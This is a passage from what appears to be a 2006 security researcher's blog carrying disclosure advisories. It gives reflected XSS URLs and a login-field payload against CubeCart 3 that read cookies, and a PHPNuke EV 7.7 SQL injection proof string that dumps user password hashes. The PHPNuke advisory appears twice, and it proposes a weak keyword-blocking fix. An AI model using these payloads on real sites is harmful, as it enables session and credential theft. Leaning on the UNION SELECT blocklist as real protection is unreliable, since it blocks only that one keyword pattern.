http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>
#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>
#############
SOLUTION
#############
no solution was available at this time
currently i found a posible fix :
see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html
or
http://bugs.cubecart.com/?do=details&id=459
##################### €nd ########################
Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Monday, January 09, 2006
###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################
PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
posible prior versions are afected.
##################
solution:
###################
No solution at this time!!!
A posible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this other :
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################
PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
posible prior versions are afected.
##################
solution:
###################
No solution at this time!!!
A posible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this other :
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
▼
2006
(14)
- ▼ December 2006 (3)
- ► November 2006 (2)
- ► October 2006 (2)
-
►
2005
(54)
- ► December 2005 (1)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...